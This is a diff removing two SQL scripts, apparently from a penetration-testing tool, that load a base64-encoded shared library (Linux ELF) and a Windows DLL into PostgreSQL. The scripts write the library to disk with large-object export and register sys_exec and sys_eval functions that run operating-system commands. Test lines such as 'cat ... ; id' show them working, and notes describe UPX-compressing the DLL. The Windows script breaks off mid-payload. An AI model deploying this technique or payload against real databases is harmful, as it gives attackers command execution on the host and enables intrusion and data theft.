-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
-UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
-UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
--- SO compiled using PostgreSQL 8.2 C libraries
--- INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
--- UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAA/ggAAH4AAAASAAsAaAAAADoHAADEAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAAClBwAACAAAAAggAAAIAAAAWwcAAAIPAAAXCQAAAg8AAHIHAAACCwAAlw';
--- UPDATE udftest SET data=data||'cAAAILAACPCAAAAgsAAC4JAAACCwAAhwcAAAIKAADYCAAAAgoAAEMJAAACCgAArQcAAAIBAADyBwAAAgUAABoIAAACBwAAQAgAAAIIAABWCAAAAg4AAO8IAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAxwQkAQAAAOj8////iYXY+///x0QkBNQJAACJHCTo/P///4mF3Pv//8eF4Pv//wAAAADrYY298Pv//7gAAAAAuf/////yronI99CNcP+LneD7//8B84lcJASLldj7//+JFCTo/P///4mF2Pv//4l0JAiNhfD7//+';
--- UPDATE udftest SET data=data||'JRCQEi4XY+///A4Xg+///iQQk6Pz///+JneD7//+Lldz7//+JVCQIx0QkBAAEAACNhfD7//+JBCTo/P///4XAD4V3////i5Xc+///iRQk6Pz///+Lhdj7//+AOAB0C4uV4Pv//8ZEEP8Avv////+Lvdj7//+7AAAAAInxidjyrvfRg8EDiQwk6Pz///+JhdT7//+Lvdj7//+J8YnY8q730YPBA4uV1Pv//4kKi73Y+///ifHyrvfRg+kBidCDwASJTCQIi5XY+///iVQkBIkEJOj8////i4XU+///i1XwZTMVFAAAAHQF6Pz///+BxCwEAABbXl9dw1WJ5YPsGIld9Il1+Il9/ItVCItCEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIgMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
--- UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
--- UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
-
--- Create a new OID for a large object, it implicitly adds an entry in the
--- PostgreSQL large objects system table
--- 
--- References:
--- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
--- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
--- Update the PostgreSQL system large objects table assigning to the just
--- created OID the binary (base64 decoded) UDF as data
--- 
--- Refereces:
--- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
--- Export the binary UDF OID to a file on the file system
--- 
--- Any folder where postgres user has read/write/execute access is valid
-SELECT lo_export(35817, '/tmp/lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
--- 
--- Notes:
--- If the library file already exists and the postgres user has write
--- access over it, it can overwrite the file
--- The following enumerates the PostgreSQL data directory
--- SELECT CURRENT_SETTING('data_directory')
--- Reference:
--- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
--- The following will save into /var/lib/postgresql/M.m/main/lib_postgresqludf_sys.so
--- SELECT lo_export(35817, 'lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
--- The following would save into / (Permission denied)
--- SELECT lo_export(35817, '/lib_postgresqludf_sys.so');
-
-
--- Create two functions from the binary UDF file
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
--- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_postgresqludf_sys.txt'); -- -rw------- 1 postgres postgres
-SELECT sys_eval('cat /tmp/lib_postgresqludf_sys.txt ; id');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);

extra/postgresqludfsys/command_execution/windows.sql

@@ -1,104 +0,0 @@
--- Notes:
--- 
--- The DLL compiled using PostgreSQL 8.3 C libraries differs from the one
--- compiled using PostgreSQL 8.2 C libraries
--- 
--- DLL compiled using PostgreSQL 8.3 C libraries
--- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- DLL compiled using PostgreSQL 8.2 C libraries
--- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- Little hack to compress the dynamic-linked library:
--- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
---   * Remember to compile it under Visual C++ 2008 with the
---     'Configuration' set as 'Release'
--- * Use upx (http://upx.sourceforge.net) over the DLL:
---   * upx -9 library.dll -o library_upx.dll
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
--- Insert the base64 encoded UDF in the table
-
--- DLL compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMA+iGDSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCcR4kqVtpBAFE1UAABYLAAAAIAAAJgAAnUB2Sf64AAAQ+MPMDxEM/9/+f1NVi2wkDItFEFZXUOgbAeaL2Iszwe4Cg+4Ef/ff/Y1OAVH/FT+MVo1TBIv4UlcgCpBXxgQ3APd/7GMXhFeL8AiUg8QcO10QdAlTQkDO/tvsDQRfi8ZeXVvDbxC6/7Z9gewIBBKhAiAAM8SJhCQEDYtvsvbZBgxAEI2GLXi8fcBudIs3jNVWg8eI2FdTbXfZjmoBiTPVaGIUU4q79tvYM/+MiCBTjVQkOBZTUon/9m3sXCQ8FnyVLIXAdMpEJBSNUAGKG2tv/whAhMl1+SvCLY0sO3YjeETdH/tuUx8gUAP+VxCAi0wkJFFNLO3lsCeL/UsgdbSLXP67sbMQqFMXkPmAPgB0BcZEN/+69gPbz8Zng8AEUKvQxj6Ze+ckGI2kJAAAH40EhRDH/oXtD4kHNlCNTwRWUe+LjLD5gmuZhF0Mi8dfM8zWXTj8KfKBxFFi/yWBqAX92z88pDsNYHUC88PpCAWvi/9WaIAXYmXMXORw7a5ZWd3/f5ejI1gEVIX2dQUzwEBew4MmAFYHtit83X1oBKcJZnKpBrkLe6O1NlkjIk407FFRCv8Ku385RQx1DjkFaxB+ZXMQg30Mu4XG3QGLCRBIiw3MiQojSC3stu4PhdR9ZBcYBot5wjW7dnfbICiJPVC7HlDrGEqnBHJw';
-UPDATE udftest SET data=data||'4cH+O8d0F2joA6gsagDp/9bwrtveaOfrB8csATyhL0xqAl797d7dyQlqH5IJJus8qhDABLjHBbOufe8fKBog4CcHXOP9+75vILQEsBsaWYk1KzR3f+52WTmydQhpczA5PRVcdBxW+tu9aAYoCFxDDf91IAPDF9veCCMW//FUbAHsjzU33AgBodt4BINl/ADfJBPZ2dsP1PxvbLD2g/gCZtJZW/+gvBm2sVhLUDFZLjUPhIfXHO07xxlUE00UGNjGt38QiX0Ig+8EO8hyUYM/f/NqmG3tt5wHdOn/NyYg+BBmbbbQXLn4VhVE1rjj9htHTfhVOU0QA9C7bVv7CHS0iQkCDBoIYOun9ogxO2kM5FlELoXtK8Q4WAZMMvw//g1HkFBDm1vJwgwAahBzf3sbQxIo0MT5i/KLXQgcVOFld3vkM8lc/Il9IAj8O/FaP7YWYzk6RBfkr2g728Kb//B0BYP+AnUuoew7wXSeVl/QzizccDte5AADkxFO9uB2WgJQFBaAEgkyzloN/yf+AXUkZCBOE1fXEJsVdy9S0gYRDftrtFP3agN1Q09hhz3bNAMhaHQuLCV/8bZw4esbceyLFwmq4FBRtMKl8mQsEGXo9i/brm04+tL+/wAZBYEq5KSuPX4hncOW7Bb/O3B8hdMkahvWVDO8u1V9RFUMDQR2WV04ItpQLhAnKANfISBzc/NmQwUciRUYiR0UiTU023dzEIk9DGaMGDgGDSyzNEuzHQgFBCWsfXdLAC1//JyPFDCVVvbPn20kBwQojUUINIuF4Pygrp2NsapwlQEcGWNs69ggJBMYCWXACRyzls/dNWCJhdgyCgTcKvCNYQMUNGidBqcz/rRsWWr3GHkt77D2fRyDPSAA+SNoW9NjBWIbegYkycOAkY8L30Aecl9qFEpQ9FhISRWq+KLG4fefnBBkWetnagg3hFmP7dYdkhsnNVk04PXzHW6FvwPkUH9LdIytbT9gCn4c3BQs1uK0VypbCeAb0jpnk+Ul2wdd3Gx4/u/c';
